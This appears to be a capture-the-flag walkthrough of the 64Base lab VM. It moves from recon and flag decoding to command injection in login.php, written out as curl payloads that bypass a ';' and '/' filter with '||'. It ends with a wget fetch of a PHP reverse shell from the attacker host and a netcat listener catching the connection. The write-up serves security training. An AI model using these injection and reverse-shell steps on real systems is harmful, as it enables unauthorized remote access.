# 64Base: 1.0.1

1. Check the IP

```
$ netdiscover -i eth1 -r 192.168.56.1/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor
 192.168.56.100  08:00:27:75:bc:c5      1      60  PCS Systemtechnik GmbH
 192.168.56.103  08:00:27:68:e7:f8      1      60  PCS Systemtechnik GmbH
```

=> IP is 192.168.56.103 (.1 is the host-only adapter on the attacking machine and .100 is VirtualBox's DHCP server, so the remaining host is the target).

2. Nmap scan of the target

```
$ nmap -p- -O -sS -T4 192.168.56.103

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-14 23:27 CET
Nmap scan report for 192.168.56.103
Host is up (0.00039s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
4899/tcp  open  radmin
62964/tcp open  unknown
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.13 seconds
```

=> Found 4 open ports:

- SSH on 22
- HTTP on 80
- radmin on 4899
- ??? on 62964

The SERVICE column here is only nmap's port-number lookup (no `-sV` was run), so each port is banner-grabbed by hand below before trusting the label.

3. Check the SSH banner

```
$ nc 192.168.56.103 22
The programs included with the Fedora GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001
#
```

=> Fake. A real sshd sends its `SSH-2.0-...` identification string before anything else; this is a canned post-login MOTD, and its details do not add up (a "Fedora" system quoting Debian's `/usr/share/doc/*/copyright` path, a last login in the year 4025 from the zero-padded address 010.101.010.001).

4. Check the unknown port

```
$ nc 192.168.56.103 62964
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
```

=> This is the real SSH server: OpenSSH 6.7p1 from Debian 8 (deb8u3 = third security update of the jessie package), which also tells us the box is Debian, not Fedora.

5. Check the radmin port

```
$ nc 192.168.56.103 4899
...
So.. You found a way in then...
but, can you pop root?
```

followed by an ASCII-art droid asking "Did you hear that?" (the drawing is reproduced flattened here, its layout was lost):

```
/~\ |oo ) Did you hear that? _\=/_ ___ / _ \ / ()\ //|/.\|\\ _|_____|_ \\ \_/ || | | === | | \|\ /| || |_| O |_| # _ _/ # || O || | | | ||__*__|| | | | |~ \___/ ~| []|[] /=\ /=\ /=\ | | | ________________[_]_[_]_[_]________/_]_[_\_________________________
```

=> Fake too: a plain-text taunt rather than the Radmin protocol. Two of the four ports are decoys, which leaves HTTP on 80 and the real SSH on 62964.

6. Check the HTTP port

```
$ curl http://192.168.56.103/
64base
64base
dmlldyBzb3VyY2UgO0QK
```

(only the page's text nodes survive in this capture; `dmlldyBzb3VyY2UgO0QK` is base64 for "view source ;D", a hint to read the HTML rather than the rendered page)
=> The web server looks like the real attack surface, and viewing the page source (as the base64 hint suggests) turns up a long hex-encoded comment.

7. Decode the comment

The comment is hex; decoding it yields base64, which in turn yields the first flag:

```
$ echo "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587054616b4a56576b644752574e6a51586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a" | xxd -r -p
ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==
$ echo "ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==" | base64 -d
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
```

=> Got flag1!

The flag body is itself base64 (the trailing `Cg==` is a newline), so decode once more:

```
$ echo "NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==" | base64 -d
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
```

=> A `user:password` pair, user `64base` and password `Th353@r3N0TdaDr01DzU@reL00K1ing4`. What it is for is not yet known; the real SSH port (62964) and any HTTP authentication found later are the obvious places to try it.

8. Crawl the site with cewl to build a wordlist, and fetch robots.txt

```
$ cewl http://192.168.56.103/ > wordlist
$ wget http://192.168.56.103/robots.txt
```

9. Run nikto, which also checks every robots.txt entry

```
$ nikto -host http://192.168.56.103
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    192.168.56.103
+ Target Port:        80
+ Start Time:         2016-12-14 23:41:29 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1fdf 0x542f6bd9b68a0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/88888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
...
```

From here on nikto prints the same `+ Entry '<path>' in robots.txt returned a non-forbidden or redirect HTTP code (200)` line for every entry. The entries it reported (the captured output ends at `/walls/`):

```
/88888/ /88888888/ /88888888888/ /88888888888P/ /c3P08P/ /C3p0/ /A280/ /above/ /AC1/ /across/
/activation/ /Adjustments/ /after/ /against/ /ago/ /air/ /Air/ /aliens/ /All/ /allies/
/and/ /Arcade/ /are/ /Area/ /Armament/ /armies/ /armour/ /arsenal/ /Art/ /as/
/Ascii/ /Assassin/ /assault/ /Assault/ /assaults/ /Astromech/ /AT-AT/ /AT-ST/ /attacks/ /Aural/
/away/ /awesome/ /b/ /B/ /back-/ /Barracks/ /base/ /Base/ /Bases/ /Battle/
/Bay/ /Bays/ /Beam/ /become/ /been/ /beneath/ /Bike/ /BioTronics/ /Bipedal/ /bizarre/
/Blast/ /BlasTech/ /Blaster/ /Block/ /bomber/ /Bomber/ /bombers/ /bone/ /Bounty/ /Brain/
/burns/ /by/ /C/ /ca-/ /ceiling/ /chasing/ /Chutes/ /civil/ /Class/ /Collection/
/command/ /Commander/ /Computer/ /conflict/ /Connecting/ /control/ /Control/ /Controls/ /Cooling/ /courage/
/Cybot/ /d/ /D/ /d88b/ /d88P/ /d8b/ /d8P/ /dark/ /DeathStar/ /Deck/
/deflector/ /Destroyer/ /destruction/ /Detention/ /devices/ /diplomatic/ /Diplomatic/ /Dismantle/ /DL-18/ /DL-44/
/Docking/ /Doors/ /Drive/ /Droid/ /Droids/ /e/ /E/ /efficient/ /Empire/ /equipped/
/escaped/ /every/ /evil/ /extremely/ /f/ /famous/ /fantastic/ /far/ /faster/ /fear/
/Fear/ /Fighter/ /fighters/ /fire/ /first-shot/ /five/ /Five/ /Fixed/ /flaming/ /Fleet/
/fleets/ /following/ /for/ /for-/ /Force/ /forces/ /freedom/ /from/ /front/ /g/
/G/ /Galactic/ /Galactica/ /galaxy/ /Gallery/ /garrison/ /great/ /ground/ /group/ /guard/
/Guard/ /Han/ /Hanger/ /has/ /have/ /heavily-armoured/ /Heavy/ /heroes/ /HH/ /HHH/
/HHHHH/ /HHHHHHHHHHHHHH/ /high/ /hope/ /houses/ /humans/ /Imperial/ /individual/ /initial/ /instituted/
/intelligent/ /Interrogation/ /Intruder/ /is/ /issued/ /It/ /its/ /j8PY8i/ /keeps/ /kill/
/killing/ /known/ /Kuat/ /l/ /L/ /Labs/ /Landing/ /Laser/ /Launch/ /Lennert/
/level/ /levels/ /Lever/ /Light/ /line/ /ll/ /located/ /long/ /longer/ /LS/
/Luke/ /M/ /machi-/ /machine/ /made/ /magical/ /Maintenance/ /Medical/ /Meeting/ /members/
/Merr-Sonn/ /meters/ /MilleniumFalconSide/ /MilleniumFalconTop/ /Miscellaneous/ /mission/ /Mission/ /Monitors/ /monster/ /monsters/
/motivator/ /multi-function/ /mystical/ /n/ /nel/ /nery/ /Neutronic/ /New/ /nn/ /no/
/o/ /o--/ /O/ /o8/ /o88888888/ /occupational/ /of/ /Offices/ /on/ /On/
/only/ /oo/ /OO/ /OOO/ /OOOOO/ /oppression/ /or/ /order/ /Order/ /outgunned/
/Outnumbered/ /overwhelming/ /pable/ /pacity/ /Pack/ /Parking/ /Person-/ /personnel/ /Pilots/ /pistol/
/Pistol/ /planet/ /Platform/ /power/ /Power/ /powerful/ /pre-fabricated/ /primary/ /prime/ /Probe/
/process/ /programming/ /protect/ /prototypes/ /Quarters/ /rack/ /racks/ /Radar/ /rag-tag/ /Ramp/
/ratio/ /reaches/ /Rebellion/ /Rebels/ /Reception/ /Recreation/ /reflexes/ /reign/ /Release/ /renowned/
/Repair/ /Rifle/ /Rifles/ /risen/ /Room/ /rooms/ /Rooms/ /same/ /Science/ /Scout/
/Security/ /Sensor/ /Sensors/ /Service/ /Setting/ /shadow/ /Shield/ /SHIELD/ /shields/ /ships/
/Shops/ /Shuttle/ /Sienar/ /Sight/ /single/ /smuggler/ /Solo/ /space/ /Space/ /Speeder/
/Spy-Eye/ /staff/ /standard-design/ /Star/ /Station/ /Stock/ /Storage/ /Stormtrooper/ /strange/ /Stun/
/Suite/ /surface/ /Surface/ /Surveillance/ /System/ /systems/ /takes/ /Technical/ /terrible/ /terror/
/than/ /the/ /The/ /their/ /them/ /These/ /thick/ /this/ /This/ /throughout/
/Tie/ /TIE/ /time/ /to/ /Tower/ /towers/ /Towers/ /Tractor/ /trade/ /Trade/
/tresses/ /Turbolaser/ /Turbolifts/ /turned/ /Turrets/ /Twin/ /two/ /Type/ /tyranny/ /unending/
/up/ /upon/ /Use/ /usually/ /vast/ /Vehicle/ /Vent/ /versatile/ /view/ /villains/
/Visual/ /Walker/ /walls/
```

=> The entries read like every word of a Star Wars blurb plus fragments of ASCII art (`/d88b/`, `/HHHHHHHHHHHHHH/`, `/o88888888/`, `/88888888888P/`), i.e. robots.txt was generated from a text dump, and the fact that every single one answers 200 means either hundreds of real directories or a catch-all handler. Before brute-forcing any of them, request a path that cannot exist and compare its status and body length with one of these; if they match, the 200s carry no information and the interesting names (`/Ascii/`, `/Art/`, `/Gallery/`, `/DeathStar/`, `/Imperial/`) need checking by content, not by status code.
redirect HTTP code (200) + Entry '/war/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Wars/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/weapon/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/weapons/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/widespread/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/with/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/wondrous/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/worlds/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/XOX/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/X-wing/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/XXXXXXXXXXXXXXXXXXXXX/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y8/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y88/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y8b/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Yard/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Zero/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/ZZ/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 429 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /members/: This might be interesting...
+ OSVDB-3092: /order/: This might be interesting...
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
+ 8115 requests: 0 error(s) and 434 item(s) reported on remote host
+ End Time: 2016-12-14 23:41:50 (GMT1) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
=> Nothing directly useful: most of the 429 Disallow entries are filler (ordinary words and ASCII-art fragments) and every one of them answers 200, so reading the file by eye is hopeless. What matters is the few entries that answer differently.

10. check robots.txt for 401
$ tail -$(( $(wc -l ./robots.txt | awk '{print $1}') - 1 )) ./robots.txt | sed "s/Disallow: //g" > tocheck
$ dirb http://192.168.56.103 ./tocheck | grep 401
+ http://192.168.56.103//admin/ (CODE:401|SIZE:461)
=> Only /admin/ answers 401 (HTTP Basic auth). The tail arithmetic just drops the first line of the file (presumably the User-agent header); the double slash is dirb appending entries that already start with '/'.

11. Try user/pass
=> fail
=> So we need to read the text!

12. Get information
$ firefox http://192.168.56.103/post.html
=> We learn that "Only respond if you are a real Imperial-Class BountyHunter",
   and that we need to use system instead of exec.

13. Check robots.txt manually
=> robots.txt spells it Imperial-class (lowercase c) while post.html says Imperial-Class. Apache on Linux is case-sensitive, so the two are different paths: try the spelling from post.html.
$ curl -vvv http://192.168.56.103/Imperial-Class
* Trying 192.168.56.103...
* Connected to 192.168.56.103 (192.168.56.103) port 80 (#0)
> GET /Imperial-Class HTTP/1.1
> Host: 192.168.56.103
> User-Agent: curl/7.49.1
> Accept: */*
>
< HTTP/1.1 401 Unauthorized
< Date: Wed, 14 Dec 2016 23:06:00 GMT
< Server: Apache/2.4.10 (Debian)
< WWW-Authenticate: Basic realm="Authorization Required"
< Content-Length: 461
< Content-Type: text/html; charset=iso-8859-1
<
401 Unauthorized
Unauthorized
This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.
Apache/2.4.10 (Debian) Server at 192.168.56.103 Port 80
* Connection #0 to host 192.168.56.103 left intact
=> Got another 401! Same realm, and the 461-byte body matches the SIZE:461 dirb reported for /admin/.

14. Try user/pass
=> It's working!!
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class
301 Moved Permanently
Moved Permanently
The document has moved here.
Apache/2.4.10 (Debian) Server at 192.168.56.103 Port 80
=> The credentials are accepted; the 301 is only Apache redirecting to the directory form of the URL. Add the trailing slash (or pass -L to curl):
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/
64base - login
[☠] ERROR: incorrect path!.... TO THE DARK SIDE!
=> "Only respond if you are a real Imperial-Class BountyHunter": the second word is the rest of the path. OK, I will not forget it again, put it in the path and try:
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/BountyHunter
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/BountyHunter/
Please login:
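Steps 10 and 13 above find the one robots.txt entry that answers 401 with a tail/sed one-liner plus dirb, and then catch the Imperial-class / Imperial-Class spelling difference by eye. The script below is an added example, not part of the original write-up or of the 64base VM, that does both in one pass: it parses Disallow lines properly (the one-liner only drops the first line and would hand comments, empty rules and Allow lines to dirb), probes every entry together with its capitalised and lowercase variants, and reports the ones that answer 401. The embedded robots.txt is a constructed sample in the style of the target's file, the default target URL is the one used in this walkthrough, and the status function is injectable so the logic can be checked without a live host.

```python
"""Enumerate robots.txt Disallow entries and find the ones behind HTTP auth."""
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Constructed sample in the style of the target's robots.txt (the real one has
# 429 entries, most of them filler). The comment, the empty rule, the Allow line
# and the duplicate are included on purpose: a naive tail/sed would keep them.
SAMPLE_ROBOTS = """User-agent: *
# nothing to see here
Disallow: /admin/
Disallow: /Imperial-class/
Disallow: /Stormtrooper/
Disallow:
Allow: /img/
Disallow: /admin/
"""


def disallowed_paths(robots_text):
    """Disallow targets in file order, without duplicates, ignoring comments,
    blank rules and every other directive."""
    seen, paths = set(), []
    for raw in robots_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"disallow\s*:\s*(\S+)", line, re.IGNORECASE)
        if m and m.group(1) not in seen:
            seen.add(m.group(1))
            paths.append(m.group(1))
    return paths


def case_variants(path):
    """Spellings worth probing for one entry: as listed, with every hyphenated
    word capitalised (Imperial-class -> Imperial-Class), and all lowercase.
    Apache on Linux is case-sensitive, so these are different resources."""
    capitalised = "/".join(
        "-".join(word[:1].upper() + word[1:] for word in segment.split("-"))
        for segment in path.split("/")
    )
    variants = []
    for candidate in (path, capitalised, path.lower()):
        if candidate not in variants:
            variants.append(candidate)
    return variants


def http_status(base_url, path, timeout=5):
    """GET base_url+path and return the status code. urllib raises HTTPError
    for non-2xx answers; the code we want (401) travels in that exception."""
    request = urllib.request.Request(urljoin(base_url, path), method="GET")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as err:
        return err.code


def find_protected(base_url, robots_text, status=http_status):
    """Every path (or case variant) from robots.txt that answers 401.
    `status` is injectable so the logic can run without a target."""
    hits = []
    for path in disallowed_paths(robots_text):
        for variant in case_variants(path):
            if status(base_url, variant) == 401:
                hits.append(variant)
    return hits


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.56.103/"
    with urllib.request.urlopen(urljoin(target, "/robots.txt"), timeout=5) as r:
        print(find_protected(target, r.read().decode("utf-8", "replace")))
```

Run it against a live box with the base URL as the only argument; a hit list of ['/admin/', '/Imperial-Class/'] is what this VM's robots.txt would produce. Probing three spellings per entry triples the request count, which is fine for 429 entries but worth throttling on a real engagement.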
15. Try to submit the form
=> We get another page!?!
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/BountyHunter/index.php
Please login:
=> This time the source contains 3 hex strings => concatenate the 3 strings and unhexify the result.

16. Decode it
$ echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -r -p
ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=
$ echo "ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=" | base64 -d
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
=> Got the 2nd flag. Its content is base64 again:
$ echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 -d
https://www.youtube.com/watch?v=vJwytFWA8uA

17. Check the video!
=> Nothing... a 9-year-old video...

18. Check everything, and finally check login.php...
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/BountyHunter/login.php
flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
=> Got the 3rd flag!!! Wtf!?
$ echo "NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=" | base64 -d
53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
=> login.php takes two GET parameters: f looks like a PHP function name and c its argument (f=exec&c=id, i.e. exec("id")). post.html told us to use system instead of exec.

19. Test the login.php parameters, remembering to use system instead of exec
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=id"
[64base Command Shell]
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
Debian GNU/Linux 8 \n \l
Wed Dec 14 23:17:29 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link
uid=1001(64base) gid=1001(64base) groups=1001(64base)
=> Command shell?! Try again with another command:
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=pwd"
[64base Command Shell]
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
Debian GNU/Linux 8 \n \l
Wed Dec 14 23:17:57 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link
=> Nothing from pwd, although id produced output. Looks like a command filter, but f(c) does seem to be called.
=> Got the 4th flag on the way: flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
$ echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 -d
64base:64base5h377

20. Try these credentials on /admin
=> fail

21. Try to get a shell
=> First dump c: if login.php really calls $f() on a string built around c, then f=var_dump shows exactly what system() receives.
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=var_dump&c=pwd"
[64base Command Shell]
string(156) "echo '
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base pwd"
=> Great! Our input is appended to a fixed command string as "echo sudo -u 64base <c>", so it never runs as a command of its own; that is why pwd printed nothing. (cat.real and grep.real show that the usual binaries have been swapped for wrappers, so var_dump tells us what system() receives, not everything the wrappers do with it afterwards.) Just need to bypass it!
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=;/bin/ls"
[64base Command Shell]
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
Debian GNU/Linux 8 \n \l
Wed Dec 14 23:25:34 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link
=> Nothing! Dump it!
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=var_dump&c=;/bin/ls"
[64base Command Shell]
string(158) "echo '
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base binls"
=> OK, there is a replace applied to c before it is appended: ';' and '/' are stripped (";/bin/ls" became "binls", and the string grew by exactly the 2 extra characters). So no semicolons and no absolute paths. Try a separator that survives the replace to get out from behind the echo:
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=test||ls%20-al"
[64base Command Shell]
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
Debian GNU/Linux 8 \n \l
Wed Dec 14 23:29:08 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link
total 48
drwxr-xr-x 6 www-data www-data 4096 Dec 13 23:10 .
drwxr-xr-x 4 www-data www-data 4096 Dec 13 23:24 ..
drwxr-xr-x 2 www-data www-data 4096 Dec 13 23:10 192.168.56.101
-rwxr-x--- 1 www-data www-data 2065 Dec  5 23:42 cat
drwxr-xr-x 2 www-data www-data 4096 Dec  5 23:42 css
-rwxr-x--- 1 www-data www-data  757 Dec  6 02:02 index.html
-rwxr-x--- 1 www-data www-data  705 Dec  5 23:42 index.jade
-rwxr-x--- 1 www-data www-data  959 Dec  6 02:13 index.php
drwxr-xr-x 2 www-data www-data 4096 Dec  5 23:42 js
-rwxr-x--- 1 www-data www-data 1106 Dec  5 23:42 license.txt
-rwxr-x--- 1 www-data www-data  835 Dec  6 02:20 login.php
drwxr-xr-x 2 www-data www-data 4096 Dec  5 23:42 scss
=> It works! The `||` survives the replace and ls runs. (Note the executable `cat` sitting in the web root, consistent with the cat.real wrapper seen above; the 192.168.56.101 directory is presumably left over from an earlier run of the wget -r used further down.) So who are we?
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=test||id"
[64base Command Shell]
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
Debian GNU/Linux 8 \n \l
Wed Dec 14 23:29:24 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link
uid=33(www-data) gid=33(www-data) groups=33(www-data)
=> Real commands run as www-data, not as the 64base that the filtered id showed. Since we can't use '/' in c, we need to get a proper shell onto the box. Do we have wget?
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=test||wget%20--version"
[64base Command Shell]
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
Debian GNU/Linux 8 \n \l
Wed Dec 14 23:30:31 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link
GNU Wget 1.16 built on linux-gnu.
+digest +https +ipv6 +iri +large-file +nls +ntlm +opie +psl +ssl/gnutls
Wgetrc: /etc/wgetrc (system)
Locale: /usr/share/locale
Compile: gcc -DHAVE_CONFIG_H -DSYSTEM_WGETRC="/etc/wgetrc" -DLOCALEDIR="/usr/share/locale" -I. -I../lib -I../lib -D_FORTIFY_SOURCE=2 -I/usr/include -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -DNO_SSLv2 -D_FILE_OFFSET_BITS=64 -g -Wall
Link: gcc -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -DNO_SSLv2 -D_FILE_OFFSET_BITS=64 -g -Wall -Wl,-z,relro -L/usr/lib -lnettle -lgnutls -lz -lpsl -lidn -luuid ftp-opie.o gnutls.o http-ntlm.o ../lib/libgnu.a
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later .
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Originally written by Hrvoje Niksic .
Please send bug reports and questions to .
=> OK, so wget is there. We can't give it a path ('/' is stripped), but "wget -r <ip>" needs none: it mirrors the remote directory into ./<ip>/ under the current directory, which here is the BountyHunter web directory. :D
=> On another terminal, in a directory containing the unpacked http://pentestmonkey.net/tools/web-shells/php-reverse-shell (set $ip and $port in php-reverse-shell.php to 192.168.56.101 and 9999 first):
(kali) $ python -m SimpleHTTPServer 80
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=test||wget%20-r%20192.168.56.101"
=> Shell uploaded! Start the listener first, then request the script so Apache executes it:
(kali) $ nc -lvvp 9999
listening on [any] 9999 ...
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/192.168.56.101/php-reverse-shell.php"
192.168.56.103: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.103] 33493
